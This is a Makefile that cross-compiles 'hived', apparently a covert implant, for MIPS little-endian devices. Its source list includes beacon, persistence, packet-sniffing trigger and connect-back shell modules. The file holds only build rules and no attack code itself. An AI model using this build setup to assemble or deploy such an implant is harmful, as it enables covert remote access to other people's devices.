#------------------------------------------------
# Makefile for compiling MIPS little-endian
#
# Makefile.mipsel
#
# For other possible targets, please enter:
#	
#		make all
#
#------------------------------------------------

ARCH=mipsel
BUILDROOT=/opt/hardhat/previewkit/mips/mipsel-linux-uclibc
BUILDTOOLS=$(BUILDROOT)/bin
UCLIBC_HDRS=$(BUILDROOT)/include
UCLIBC_LIBS=$(BUILDROOT)/lib
CC=${BUILDTOOLS}/gcc
STRIP=${BUILDTOOLS}/strip

#BIN = .SERVER=$(SERVER_BASENAME)-$(ARCH)
BIN = .

LIB = .

SERVER_BASENAME = hived
SERVER=$(SERVER_BASENAME)-$(ARCH)

POLARSSL = ../libs/polarssl-0.14.0
INCLUDES = -I $(UCLIBC_HDRS) -I$(POLARSSL)/include -I../libs
LIBPOLARSSL = $(POLARSSL)/library/libpolarssl.a

SERVER_SRCS = beacon.c persistence.c \
    survey_mac.c survey_uptime.c trigger.c daemonize.c \
    main.c init_strings.o string_utils.o tiny_crc16.c \
	trigger_b64.c trigger_exec.c trigger_payload.c trigger_sniff.c \
	threads.c connect_shell.c shell.c ../libs/crypto.c $(LIBPOLARSSL)

CFLAGS = -Wall -Wextra -ansi -std=gnu99
CFLAGS += -L$(UCLIBC_LIBS) -Os -W -Wall -D_IH_X86_BUILD -lpthread
CFLAGS += $(INCLUDES) -DLINUX -DUCLIBC

DBGFLAGS += -DDEBUG -D_DEBUG -g

#STRIPFLAGS += --strip-all --remove-section=.comment --remove-section=.note

OS = $(shell uname)

ifdef	STATIC
CFLAGS += -static
endif

.PHONY: all
all: $(LIBPOLARSSL) $(SERVER) $(SERVER)-dbg

$(LIBPOLARSSL): strings
	cd $(POLARSSL)/library && $(MAKE) -f Makefile.$(ARCH)
#	cd $(POLARSSL)/library && $(MAKE) -f Makefile.$(ARCH) && cd ../../../server

.PHONY: debug
debug: $(LIBPOLARSSL) $(SERVER)-dbg

.PHONY: release
release: $(LIBPOLARSSL) $(SERVER)

$(SERVER): strings $(LIBPOLARSSL)
	$(CC) $(CFLAGS) $(COMMON_SRCS) $(SERVER_SRCS) -L$(LIB) -o $(BIN)/$(SERVER)
#	$(STRIP) $(BIN)/$(SERVER)
	md5sum $(BIN)/$(SERVER) > $(BIN)/$(SERVER).md5

$(SERVER)-dbg: strings $(LIBPOLARSSL)
	$(CC) $(CFLAGS) $(DBGFLAGS) $(COMMON_SRCS) $(SERVER_SRCS) -L$(LIB) -o $(BIN)/$(SERVER)-dbg
	md5sum $(BIN)/$(SERVER)-dbg > $(BIN)/$(SERVER)-dbg.md5

.PHONY: strings
strings: init_strings.o string_utils.o

init_crypto_strings.c: crypto_strings.txt string_utils.o
	python mod_gen_cryptostring_header.py crypto_strings.txt CRYPTO_STRINGS

init_strings.o: init_strings.c string_utils.o
	$(CC) -c init_strings.c

init_strings.c: server_strings.txt string_utils.h
	python mod_gen_string_header.py server_strings.txt SERVER_STRINGS

string_utils.o: string_utils.h string_utils.c
	$(CC) -c string_utils.c 

.PHONY: clean
clean:
	make -f ./Makefile clean

.PHONY: svnclean
svnclean: clean

.PHONY: md5
md5: all
	md5sum $(BIN)/$(SERVER)-dbg > $(BIN)/$(SERVER)-dbg.md5
	md5sum $(BIN)/$(SERVER) > $(BIN)/$(SERVER).md5

.PHONY: tarball	
tarball:
	make -f ./Makefile tarball
